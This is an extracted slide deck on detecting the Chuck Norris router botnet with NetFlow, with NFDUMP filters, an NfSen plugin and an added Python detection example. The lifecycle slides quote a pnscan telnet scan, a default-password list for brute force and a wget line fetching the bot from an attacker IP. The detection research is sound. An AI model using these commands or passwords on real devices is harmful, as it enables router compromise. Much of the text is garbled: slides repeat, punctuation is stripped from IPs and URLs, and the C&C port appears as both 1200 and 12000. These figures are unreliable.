[Figure: screenshot of the plugin web interface listing a detected infected host]
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for the Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation
Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
we need to customize the detection methods
plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs, ...
No AV software, missing patches and firmware updates
But they should be protected
Experience
NetFlow can monitor all such devices in a network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
The detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection – Phase I

Incoming and outgoing TCP SYN scans on port 23

[Figure: infected device in the local network scanning a list of C-class networks (147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x, ...) on TCP/23; the scan flows carry SYN or SYN+RESET flags]

NFDUMP detection filter:
(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))

A flow carrying only a SYN flag is an unanswered connection attempt and a SYN+RST flow a refused one; the filter keeps both and excludes flows with ACK, PUSH, URG or FIN set, which belong to established sessions.
Connections to Botnet Distribution Sites – Phase II

Bot's web download requests from infected host

[Figure: infected device in the local network connecting to several botnet distribution web servers on TCP/80; flows carry SYN+ACK flags]

NFDUMP detection filter:
(src net local_network) and (dst ip web_servers¹) and (dst port 80) and (proto TCP) and (flags SA and not flag R)

¹ IP addresses of attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III

Bot's IRC traffic with command and control center

[Figure: infected device in the local network connecting to the botnet C&C server on TCP/1200; flows carry SYN+ACK flags]

NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server²) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)

² IP address of an attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV

Attacker's DNS or OpenDNS Queries
- Common DNS requests forwarded to OpenDNS servers
- Targeted DNS requests forwarded to attacker's spoofed DNS

DNS Queries Outside Local Network

Used for Phishing Attacks
- E.g. Facebook or banking sites

[Figure: infected device in the local network sending UDP/53 queries to an OpenDNS server and to the spoofed DNS server]

NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS servers³) or (dst ip DNS servers⁴)) and (proto UDP) and (dst port 53)

³ IP addresses of common OpenDNS servers
⁴ IP addresses of attacker's spoofed DNS servers
ADSL String Detection

Looking for ADSL String
- ADSL string indicates Chuck Norris botnet
- Searching in victim's hostname or victim's WHOIS
- Querying DNS server and parsing received hostname
- Querying WHOIS database and parsing received info

[Screenshot: reverse DNS / WHOIS lookup output for a victim address containing the string "adsl"]
Detected Chuck Norris Servers

Known IP Addresses
- Web server addresses: 87.98.173.190, 87.98.163.86
- IRC server addresses: 87.98.173.190, 87.98.163.86
- IRC server port: 12000
- OpenDNS server addresses: 208.67.222.222, 208.67.220.220
- Spoofed DNS server: 87.98.163.86

This data is used in the detection methods by default.
IP address updates are published on the project page.
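The four NFDUMP filters of Phases I–IV re-expressed as Python predicates and run over constructed flow records, so that the flag logic and the per-host correlation can be tried offline. This is an added example, not the authors' NfSen plugin; the server addresses come from the slide above, while the local prefix 147.251.0.0/16, the simplified CSV flow format and the scan threshold are assumptions.

```python
# Added example (not the authors' NfSen plugin): the talk's NFDUMP filters for
# Phases I-IV as Python predicates, run over constructed flow records given as
# "sa,da,sp,dp,proto,flags" lines, flags in nfdump letter notation (U A P R S F,
# '.' for an unset bit).
import ipaddress
from collections import defaultdict

# Assumption: the scan diagram lists 147.251.x.x networks, so a /16 stands in
# for the talk's "local_network".
LOCAL_NETWORK = ipaddress.ip_network("147.251.0.0/16")
# Server addresses from the "Detected Chuck Norris Servers" slide.
WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 1200  # port used by the slide's Phase III filter
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
SCAN_THRESHOLD = 3  # assumption: distinct telnet targets before reporting a scanner

def parse_flow(line):
    sa, da, sp, dp, proto, flags = (x.strip() for x in line.split(","))
    return {"sa": sa, "da": da, "sp": int(sp), "dp": int(dp),
            "proto": proto.upper(),
            "flags": frozenset(c for c in flags if c in "UAPRSF")}

def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NETWORK

def telnet_scan(f):
    """Phase I: (net local_network) and (dst port 23) and (proto TCP) and
    ((flags S and not flags ARPUF) or (flags SR and not flags APUF)).
    SYN alone is an unanswered attempt, SYN+RST a refused one."""
    if not (is_local(f["sa"]) or is_local(f["da"])):
        return False
    if f["dp"] != 23 or f["proto"] != "TCP":
        return False
    return f["flags"] in (frozenset("S"), frozenset("SR"))

def _local_to(f, servers, port, proto):
    """(src net local_network) and (dst ip servers) and (dst port) and (proto)."""
    return (is_local(f["sa"]) and f["da"] in servers
            and f["dp"] == port and f["proto"] == proto)

def _syn_ack_no_rst(f):
    """(flags SA and not flag R): handshake completed, not refused."""
    return {"S", "A"} <= f["flags"] and "R" not in f["flags"]

def distribution_site(f):
    """Phase II: bot download request to a botnet distribution web server."""
    return _local_to(f, WEB_SERVERS, 80, "TCP") and _syn_ack_no_rst(f)

def cnc_connection(f):
    """Phase III: IRC session with the botnet C&C server."""
    return _local_to(f, IRC_SERVERS, IRC_PORT, "TCP") and _syn_ack_no_rst(f)

def dns_query(f):
    """Phase IV: UDP/53 query to OpenDNS or to the attacker's spoofed DNS."""
    return _local_to(f, OPENDNS_SERVERS | SPOOFED_DNS_SERVERS, 53, "UDP")

PHASES = {"telnet_scan": telnet_scan, "distribution_site": distribution_site,
          "cnc": cnc_connection, "dns": dns_query}

def detect(lines):
    """Return {phase: {source host: set(destination hosts)}} over all flows."""
    hits = {name: defaultdict(set) for name in PHASES}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        f = parse_flow(line)
        for name, pred in PHASES.items():
            if pred(f):
                hits[name][f["sa"]].add(f["da"])
    return hits

def suspicious_hosts(hits):
    """Hosts worth reporting, each mapped to the sorted phases it triggered.
    Scanning counts only from SCAN_THRESHOLD targets up, and a host whose only
    evidence is DNS traffic is dropped: OpenDNS use by itself is common."""
    reasons = defaultdict(list)
    for host, targets in hits["telnet_scan"].items():
        if len(targets) >= SCAN_THRESHOLD:
            reasons[host].append("telnet_scan")
    for phase in ("distribution_site", "cnc", "dns"):
        for host in hits[phase]:
            reasons[host].append(phase)
    return {h: sorted(r) for h, r in reasons.items() if r != ["dns"]}

# Constructed sample: 147.251.3.10 scans, fetches the bot, joins the C&C and
# queries both DNS servers; 198.51.100.9 probes in; 147.251.5.5 is benign.
SAMPLE_FLOWS = """\
# sa,da,sp,dp,proto,flags
147.251.3.10,203.0.113.5,40001,23,TCP,....S.
147.251.3.10,203.0.113.6,40002,23,TCP,...RS.
147.251.3.10,203.0.113.7,40003,23,TCP,....S.
147.251.3.10,203.0.113.8,40004,23,TCP,.AP.SF
198.51.100.9,147.251.4.20,5555,23,TCP,....S.
147.251.3.10,87.98.163.86,40005,80,TCP,.AP.SF
147.251.3.10,87.98.163.86,40006,1200,TCP,.AP.S.
147.251.3.10,208.67.222.222,40007,53,UDP,......
147.251.3.10,87.98.163.86,40008,53,UDP,......
147.251.5.5,208.67.220.220,40009,53,UDP,......
147.251.5.5,198.51.100.20,40010,80,TCP,.AP.SF
""".splitlines()
```

Running `suspicious_hosts(detect(SAMPLE_FLOWS))` reports only 147.251.3.10, with all four phases, while the single inbound probe and the host that merely uses OpenDNS stay below the reporting bar.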
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin

Plugin Features
- Detects Chuck Norris-like botnet behavior
- Based on NetFlow and other network data sources
- Processes data regularly and provides real-time output

Plugin Architecture
- Compliant with NfSen plugin architecture recommendations
- PHP frontend with a Perl backend and a PostgreSQL DB
- Web, e-mail and syslog detection output and reporting
Plugin Architecture

[Figure: BACKEND – cndet.pm and cndetdb.pm, with the data sources (NetFlow data, DNS, WHOIS db) and PostgreSQL; FRONTEND – cndet.php; backend and frontend communicate through the nfsend communication interface]
Plugin Methods Architecture

[Figure: cndetdb.pm, PostgreSQL and the data sources (NetFlow data, DNS, WHOIS db) feeding the five detection methods: Telnet scan detection, Botnet distribution sites detection, Botnet C&C centers detection, DNS spoofing attack detection, ADSL string detection]
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets

Botnet Lifecycle Similar for Majority of Botnets
- scanning for possible bots
- infection of vulnerable devices
- bot initialization/update
- botnet operation

Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for detection of other botnets
- we need to customize the detection methods
- plugin distributed under the BSD license
Conclusion

Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs, ...
- No AV software, missing patches and firmware updates
- But they should be protected

Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
- Chuck Norris is down but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- Detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
